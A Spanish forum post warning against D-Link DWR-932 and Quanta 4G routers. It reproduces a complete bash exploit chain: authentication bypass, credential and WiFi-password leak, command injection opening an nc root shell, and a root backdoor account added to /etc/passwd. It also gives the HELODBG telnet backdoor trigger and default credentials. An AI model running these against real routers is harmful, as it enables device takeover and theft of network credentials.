El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 03-10-2016 22:06:24

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,066

D-Link WiFi+4G: Unos productos a evitar

Múltiples brechas de seguridad criticas en la gama "quanta router" y los DWR-932

dlink_shit_2.jpg

  Acabo de publicar un tema sobre el PIN WPS genérico de la gama de CPE WiFi+4G propuesta por D-Link: Todo sobre el Pin generico de los D-Link DWR-932 y Quanta 4G-WiFi
  La brecha WiFi es solo una parte del desastre generalizado.

   Hay tres avisos de seguridad sobre estos modelos, cada aviso incluye varias brechas de seguridad criticas:

  1. Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...) de Pierre KIM @ Pierre kim/ Git Hub

  2. Multiple vulnerabilities found in Quanta LTE routers (backdoor, backdoor accounts, RCE, weak WPS ...) de Pierre KIM @ Pierre kim / Git Hub

  3. D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure de Saeed reza ZAMANIAN @ PacketStorm

  Afectan estos routers

  1. quanta_wps_7.jpg
        - Quanta 4G WiFi Router QDH
        - Quanta 4G WiFi Router UNE
        - Quanta 4G WiFi Router MOBILY (QDH-Mobily - CPE342X)
        - Quanta 4G WiFi Router Yoomee

  2. D-Link_DWR-932_2.png
        - El router portátil D-Link DWR-932 

Varias Puertas traseras

  Podemos hablar por ejemplo del DWR-932.
Tiene el servicio telnet y ssh habilitado por defecto (sin que el usuario este advertido) con dos cuentas.
Sus credenciales son muuuuuy originales.

  • admin:admin

  • root:1234

Hay que ser un maestro de la ingeniería social para encontrarlos lol
  Es un buen ejemplo para ilustrar la magnitud de la catástrofe. 
  Hay backdoor mas sofisticadas como esta:

If a client sends "HELODBG" to the router, the router will execute
`/sbin/telnetd -l /bin/sh`, allowing to access without authentication
to the router as root.

  Esta si que es original, esto no lo podemos negar: Es possible abrir una consola root mandando la palabra HELODBG sobre el puerto 39889
La mandamos

[email protected]:~$ echo -ne "HELODBG" | nc -u 192.168.1.1 39889
    Hello
    ^C

Parramos el proceso (estamos autenticados) y podemos ahora lanzar un sesión telnet sin tener que entrar los credenciales:

[email protected]:~$ telnet 192.168.1.1
    Trying 192.168.1.1...
    Connected to 192.168.1.1.
    Escape character is '^]'.

    OpenEmbedded Linux homerouter.cpe


    msm 20141210 homerouter.cpe

    / # id
    uid=0(root) gid=0(root)

Chapeau D-Link!

Varias formas de ejecutar comandos arbitrariamente para tomar el control remoto del equipo

Podéis admirar este pequeño exploit en bash que

  1. -  Se salta los credenciales para entrar en la interfaz

  2. -  Obtiene los credenciales de administrador con el infoleak

  3. -  Prepara el terreno para realizar de una "petición en sitios cruzados" (CSRF token)

  4. -  Habilita una puerta trasera con privilegios root

  5. -  Crea una cuenta ssh para el manejo remoto del dispositivo

  6. -  Para finalmente conectarse mediante servicio ssh con la cuenta que dispone de todos los privilegios requeridos recién creada,

#!/bin/sh

TMP_DIR=$(mktemp -d)

echo -n "Stage [1] - Bypassing authentication ..."

wget -qO${TMP_DIR}/stage1-axx 'http://192.168.1.1/data.ria?CfgType=get … ile=system'
wget -qO${TMP_DIR}/stage1-wifi 'http://192.168.1.1/data.ria?CfgType=get … &file=wifi'
wget -qO${TMP_DIR}/stage1-network 'http://192.168.1.1/data.ria?DynUpdate=up_5s'

echo " OK"
echo -n "  local admin             = "
http_login=$(grep web_usrname ${TMP_DIR}/stage1-axx | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }')
echo $http_login
echo -n "  local passw             = "
http_password=$(grep web_passwd ${TMP_DIR}/stage1-axx | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }')
echo $http_password
echo -n "  wifi access point       = "
grep ssid ${TMP_DIR}/stage1-wifi | head -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n "  wifi password           = "
grep wpa_passphrase= ${TMP_DIR}/stage1-wifi | head -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n "  WPS PIN                 = "
grep enrollee_pin ${TMP_DIR}/stage1-wifi | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n "  guest wifi access point = "
grep ssid ${TMP_DIR}/stage1-wifi | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n "  guest wifi password     = "
grep wpa_passphrase= ${TMP_DIR}/stage1-wifi | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'

echo -n "  public ip               = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network  | sort | grep ip | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n "  gateway                 = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network  | sort | grep gateway | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n "  subnet mask             = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network  | sort | grep subnet_mask | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n "  dns server #1           = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network  | sort | grep dns1 | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n "  dns server #2           = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network  | sort | grep dns2 | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'


echo
echo -n "Stage [2] - RCE ..."
http_login=$(echo $http_login | tr -d '\r')
http_password=$(echo $http_password | tr -d '\r')
http_session=$(wget -qO/dev/null --server-response --post-data="uname=$http_login&passwd=$http_password" http://192.168.1.1/login.cgi 2>&1 | grep Cooki | awk '{ print $2 }')
http_csrf_token=$(wget -qO- --header="Cookie: ${http_session=}" "http://192.168.1.1/data.ria?token=1")
wget -qO/dev/null --header="Cookie: ${http_session}" --post-data="{\"CfgType\":\"tracert\",\"cmd\":\"tracert\",\"url\":\"\`/bin/nc -l -p 1337 -e /bin/ash\`\",\"authID\":\"${http_csrf_token}\"}" "http://192.168.1.1/webpost.cgi"
echo " OK"
echo "Stage [3] - Checking the router ... OK"
(echo id; echo echo "backdoor:htEcF9TWn./9Q:0:0:backdoor:/:/bin/sh >> /etc/passwd" ; echo exit) | nc 192.168.1.1 1337
echo -n "Stage [4] - Creating a backdoor account ..."
echo " OK"
echo "Stage [5] - Connecting as backdoor/admin to the remote sshd ..."
echo
echo "Have fun!"
echo
expect -c 'set timeout 3; spawn ssh [email protected]; expect "password: $"; send "admin\r"; interact'

  En la proximna versión se hará tambien la colada. tongue

Respuesta lamentable por parte de D-Link

Se podría excusar unos fallos tan groseros si se corigierán
El problema es que desde D-Link han dejado muy caro que nos será el caso si miramos el "Time line" (la cronología) de los "full dicslosures"

## Report Timeline

* Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers.
* Apr 04, 2016: A public advisory about Quanta routers is sent to
security mailing lists.
* Jun 09, 2016: Pierre Kim is contacted by Gianni Carabelli about
Dlink DWR-932 router's similarities to Quanta routers.
* Jun 14, 2016: Pierre Kim thanks Gianni Carabelli and says he will
contact Dlink.
* Jun 15, 2016: Dlink is contacted about vulnerabilities in the
DWR-932 router (=~ 20 vulns).
* Jun 16, 2016: Dlink Security Incident Response Team (William Brown)
acknowledges the receipt of the report and says they will provide
further updates.
* Jul 09, 2016: Pierre asks for updates.
* Jul 09, 2016: Dlink says they will have correction by July 15.
* Jul 19, 2016: Pierre asks for updates.
* Aug 19, 2016: Pierre asks for updates.
* Sep 12, 2016: Pierre asks for updates and says he will soon release
an advisory as 90 days have passed without news.
* Sep 12, 2016: [email protected] is contacted to get pieces of advice
about the disclosure.
* Sep 13, 2016: CERT recommends to try to contact D-link and to
publish the advisory.
* Sep 13, 2016: Dlinks says they don't have a schedule for a firmware
release.
Customers who have questions should contact their
local/regional D-Link support offices for the latest information.
support.dlink.com will be updated in the next 24 hours.
* Sep 28, 2016: A public advisory is sent to security mailing lists.

  * El autor ha comunicado las casi 20 vulnerabilidades a D-Link el 15 de junio 2016 y se le ha respondido enseguida (día 16) diciendo que se iba a hacer una actualización de seguridad
  * Tras esperar tres meses Pierre KIM ha amenazado con hacer publicas las brechas si D-Link no hacía nada en un plazo de 90 diás.
  Son 3 meses más, lo que les dejaba en total 6 meses para arreglar estos fallos
  * ¿6 meses para arreglar un firmware?
  Es demasiado difícil para D-Link y tiran la toalla. mad El cliente se puede ir a freír espárragos si quiere un router seguro: Ninguna actualización de seguridad al horizonte.
Absolutamente vergonzoso.
  Sobre todo por parte de una marca "con pretensiones" que nos hace pagar una "supuesta" cualidad
  Por ejemplo el DWR-932 se compra alrededor de 120€ en mediamarket (si lo compras si que eres tonto) 

dlink_is_shit_1.jpg

102€ + la IVA = superamos los 120€
  El precio de una router Aafa ac1200... ¡Alucinante!
Y es mucho más que lo que cuestan modelos similares de otras marcas y sin tantas brechas de seguridad
He presentado en el foro Huawei un router 4G WiFi portátil que cuesta unos 80€ (que no son pocos) para un nivel de prestaciones más que comparable  .

Los routers WiFi + 4G de D-Link no son unos routersSon unos enormes agujeros de seguridad con antenas.
¡Es un timo; son inseguros!¡No los compras!

Conectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Asrock 775i945GZ por josep345
8 159 Hoy 08:17:19 por thuglife
45 6312 Hoy 03:41:05 por skynet777
23 1371 Ayer 21:31:05 por kcdtv
14 313 Ayer 21:07:36 por josep345
1 56 Ayer 20:53:23 por josep345

Pie de página

Información del usuario

Ultimo usuario registrado: crow
Usuarios registrados conectados: 1
Invitados conectados: 19

Conectados: kcdtv

Estadisticas de los foros

Número total de usuarios registrados: 1,044
Número total de temas: 1,080
Número total de mensajes: 10,708

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21